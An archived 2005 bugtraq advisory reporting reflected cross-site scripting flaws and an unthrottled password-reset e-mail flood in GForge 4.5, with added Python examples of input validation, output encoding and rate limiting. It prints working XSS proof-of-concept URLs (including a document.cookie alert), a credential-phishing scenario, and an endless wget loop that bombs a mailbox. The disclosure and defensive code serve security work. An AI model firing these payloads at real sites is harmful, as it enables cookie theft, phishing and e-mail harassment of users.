[39992] in bugtraq


Cross Site Scripting vulnerabilities in GForge

daemon@ATHENA.MIT.EDU (Joxean Koret)
Thu Jul 28 21:00:09 2005

From: Joxean Koret <joxeankoret@yahoo.es>
To: bugtraq@securityfocus.com,
        Full Disclosure <full-disclosure@lists.netsys.com>,
        Secunia <vuln@secunia.com>,
        Security Tracker <bugs@securitytracker.com>, core@gforge.org,
        tim@perdue.net
Date: Wed, 27 Jul 2005 22:37:16 +0200
Message-Id: <1122496636.26878.2.camel@localhost.localdomain>



---------------------------------------------------------------------------
          Various Vulnerabilities in GForge
---------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2005
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

GForge - 4.5 (Current)

GForge has tools to help your team collaborate, like message forums and
mailing lists, and tools to create and control access to Source Code
Management repositories like CVS and Subversion. GForge automatically creates
a repository and controls access to it depending on the role settings of the
project.

Web : http://gforge.org/

---------------------------------------------------------------------------

A) Cross Site Scripting Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1.- In the Forum Module:

	http://[target]/forum/forum.php?forum_id="><script>alert('hi')</script>
	http://[target]/forum/forum.php?group_id="><script>alert('hi')</script>

(NOTE: The group_id parameter is ALWAYS vulnerable.)

2.- In the Task Module:

	http://[target]/pm/task.php?func=detailtask&project_task_id="><h1>hi!</h1>&group_id=1&group_project_id=3

3.- In the Snippets Module:

	http://[target]/snippet/detail.php?type=snippet&id=21"><iframe%20src=http://www.playboy.com></iframe><font%20size="

4.- In the search engine:

To try it, simply enter any valid XSS test such as "><h1>hi!!!</h1> in the
search field and press enter, or try the following URL:

	http://[target]/search/?type_of_search=soft&words=%22%3E%3Ch1%3EHi%21%3C%2Fh1%3E%3Ciframe+src%3Dhttp%3A%2F%2Fslashdot.org%3E%3C%2Fiframe%3E&Search=Search

5.- In other modules:

	http://[target]//frs/admin/qrs.php?group_id="><script>alert(document.cookie)</script>
	http://[target]/notepad.php?form=parent;%0d%0a-->%0d%0a</script><body><h1>hi!</h1></body></html><!--

(NOTE: The rows, cols and wrap parameters are also vulnerable.)

6.- In the Login Form:

The login form is also vulnerable to XSS (Cross Site Scripting) attacks. This
may be used to launch phishing attacks: send an HTML e-mail (e.g. saying that
the user needs to upgrade to the latest GForge version because of a security
problem) containing a link to a specially crafted URL that inserts an HTML form
into the GForge login page; when the user presses the login button, the
credentials are sent to the attacker's web site.

POC. To "play" with this, simply go to the login page and enter the following
text in the login field:

	"><iframe src=http://www.playboy.com></iframe><font size="
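Every payload in section A works the same way: a query parameter is copied into the page without encoding, and the leading `"` or `</script>` of the payload closes the attribute or script element the value was supposed to sit inside. The following is an added example, written for this page and not GForge's own code (GForge is PHP; this is Python so the behaviour can be checked directly). It takes two of the advisory's payloads, decoded from the PoC URLs, and shows the unsafe concatenation beside two hardened forms: type validation for numeric ids such as `group_id`, and context-specific output encoding for free text (the search `words` field) and for values echoed into an inline `<script>` block, which is the context the notepad.php payload is built to break out of. Function names, the attribute/script markup and the page fragments are assumptions made for the example; the PHP equivalents named in the comments are `(int)` casts and `htmlspecialchars(..., ENT_QUOTES)`.

```python
import html
import json
import re

# Constructed payloads, decoded from the advisory's own PoC URLs (no new
# exploit material): one breaks out of an HTML attribute, the other out of
# an inline <script> element.
ATTR_BREAKOUT = '"><script>alert(\'hi\')</script>'
SCRIPT_BREAKOUT = "parent;\r\n-->\r\n</script><body><h1>hi!</h1></body></html><!--"


def render_vulnerable_attr(group_id: str) -> str:
    """Deliberately unsafe: the raw query parameter is concatenated into an
    attribute value, the pattern the advisory reports for group_id."""
    return '<input type="hidden" name="group_id" value="' + group_id + '">'


def is_valid_id(value: str) -> bool:
    """Numeric ids have a type: anything but a small positive integer is
    rejected before it can reach the page (PHP: (int) cast + range check)."""
    return re.fullmatch(r"[1-9][0-9]{0,9}", value) is not None


def render_hardened_id(group_id: str) -> str:
    if not is_valid_id(group_id):
        raise ValueError("group_id must be a positive integer")
    return '<input type="hidden" name="group_id" value="' + group_id + '">'


def render_hardened_text(words: str) -> str:
    """Free text such as the search 'words' field has no type to check, so
    output encoding is the defence. quote=True matters: it encodes the double
    quote every attribute-breakout payload starts with
    (PHP: htmlspecialchars($words, ENT_QUOTES))."""
    return '<input type="text" name="words" value="' + html.escape(words, quote=True) + '">'


def render_vulnerable_script(form: str) -> str:
    """Deliberately unsafe: a parameter echoed into an inline script block."""
    return "<script>\nvar target = " + form + ";\n</script>"


def render_hardened_script(form: str) -> str:
    """Inside <script>, html.escape is the wrong tool. The HTML parser ends
    the script element at the first '</script' it sees, before any JavaScript
    runs, so the value is emitted as a JSON string literal (newlines and
    quotes escaped) and '</' is additionally rewritten to '<\\/', which is
    the same string in JavaScript but inert to the HTML parser."""
    literal = json.dumps(form).replace("</", "<\\/")
    return "<script>\nvar target = " + literal + ";\n</script>"


def attr_breakout_succeeds(rendered: str) -> bool:
    """True if the payload's <script> tag reaches the browser unencoded."""
    return "<script>" in rendered


def script_element_count(rendered: str) -> int:
    """Number of places where the HTML parser would end a script element;
    anything above 1 means the injected close tag is live."""
    return rendered.lower().count("</script")


def embedded_script_value(rendered: str) -> str:
    """Reads the literal back out of the hardened page the way a JS engine
    would, to show the original value is preserved exactly."""
    literal = rendered.split("var target = ", 1)[1].split(";\n</script>", 1)[0]
    return json.loads(literal)
```

The two hardened renderers are not interchangeable: `render_hardened_text` makes `"><script>` harmless in an attribute but would leave `</script>` intact if pasted into a script block, while `render_hardened_script` produces output that is only safe inside a JavaScript string literal. The fix for the advisory's parameters is therefore per reflection point, not a single global filter.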

B) E-Mail Flood
~~~~~~~~~~~~~~~

The 'forgot your password?' feature allows a remote user to load a certain URL
to cause the service to send a validation e-mail to the specified user's e-mail
address. There is no limit to the number of messages sent over a period of
time, so a remote user can flood the target user's secondary e-mail address
(e-mail flood, e-mail bomber).

The following is a "Proof Of Concept" of this vulnerability:

	[joxean@nemobox]$ while [ true ]; do
	>	wget http://[target]/account/lostpw.php?loginname=joxean
	> done

The "pending account" confirmation e-mail is also vulnerable, so a malicious
user can flood any e-mail box, even if they are not registered GForge users.
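The missing control in both the lost-password and pending-account flows is a budget on how often the server will send mail for a given mailbox. The following is an added example, not GForge code, of a sliding-window limiter a practitioner would put in front of such an endpoint: one budget per target mailbox (so a victim cannot be bombed from many source addresses) and one per requesting client (so one client cannot spray many victims). The class and function names, the e-mail addresses, the client IPs and the injectable clock are all constructed for the example; the `replay_wget_loop` helper stands in for the advisory's unbounded `wget` loop.

```python
import time
from collections import deque


class MailRateLimiter:
    """Sliding-window limiter for endpoints that send mail on request.

    Two independent budgets are enforced and both must have room:
      * per target mailbox  (per_target sends per window_s seconds),
      * per requesting client (per_client sends per window_s seconds).
    The clock is injectable so the behaviour can be tested without sleeping.
    """

    def __init__(self, per_target=3, per_client=20, window_s=3600,
                 clock=time.monotonic):
        self.per_target = per_target
        self.per_client = per_client
        self.window_s = window_s
        self.clock = clock
        self._by_target = {}   # mailbox -> deque of send timestamps
        self._by_client = {}   # client ip -> deque of send timestamps

    def _recent(self, table, key, now):
        """Return the timestamp queue for key with expired entries dropped."""
        q = table.setdefault(key, deque())
        while q and now - q[0] >= self.window_s:
            q.popleft()
        return q

    def allow(self, target_mailbox: str, client_ip: str) -> bool:
        """True (and the send is recorded) or False (drop the request).
        Mailbox keys are normalised so Joxean@ and joxean@ share one budget."""
        now = self.clock()
        tq = self._recent(self._by_target, target_mailbox.strip().lower(), now)
        cq = self._recent(self._by_client, client_ip, now)
        if len(tq) >= self.per_target or len(cq) >= self.per_client:
            return False
        tq.append(now)
        cq.append(now)
        return True


class FakeClock:
    """Deterministic stand-in for time.monotonic (constructed for the demo)."""

    def __init__(self):
        self.t = 0.0

    def __call__(self):
        return self.t

    def advance(self, seconds):
        self.t += seconds


def replay_wget_loop(limiter, requests, target="joxean@example.org",
                     client_ip="198.51.100.7"):
    """Replays the advisory's unbounded wget loop; returns (sent, dropped)."""
    sent = sum(1 for _ in range(requests) if limiter.allow(target, client_ip))
    return sent, requests - sent


def demo():
    """Burst from one client, the same client after the window expires, and
    a spray over many mailboxes from a second client."""
    clock = FakeClock()
    limiter = MailRateLimiter(per_target=3, per_client=10, window_s=3600,
                              clock=clock)
    burst = replay_wget_loop(limiter, 500)      # only 3 mails leave
    clock.advance(3600)                         # window expires
    after = replay_wget_loop(limiter, 5)        # budget is back: 3 of 5
    spray = sum(limiter.allow(f"user{i}@example.org", "203.0.113.9")
                for i in range(50))             # capped by per_client: 10
    return burst, after, spray


if __name__ == "__main__":
    print(demo())
```

For lostpw.php the target key is the mailbox the login name resolves to, not the login name itself; for the pending-account resend it is the address the registrant supplied. On a real deployment the two tables live in a store shared by all web workers (database or memcached), not in process memory, or the limiter is bypassed by spreading requests across workers.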


The fix:
~~~~~~~~

There is no fix at the moment.


Workarounds:
~~~~~~~~~~~~

There are no workarounds except using a method to automatically catch the XSS
request, such as WASP (available via CVS at https://savannah.nongnu.org/wasp)
or mod_security (available at http://www.modsecurity.org/) for Apache Web
Servers.


Timeline:
~~~~~~~~~

25-Apr-2005 Vendor contacted
25-Apr-2005 Initial Vendor response (no interest in fixing the bugs)
25-Apr-2005 Response to vendor
04-Jun-2005 One XSS bug (not discovered by me) closed without a fix
23-Jun-2005 Vendor RE-contacted (No response)
27-Jul-2005 Advisory released

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is provided
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of using
the information or demonstrations provided in any part of this advisory.

---------------------------------------------------------------------------

Contact:
~~~~~~~~

	Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es






		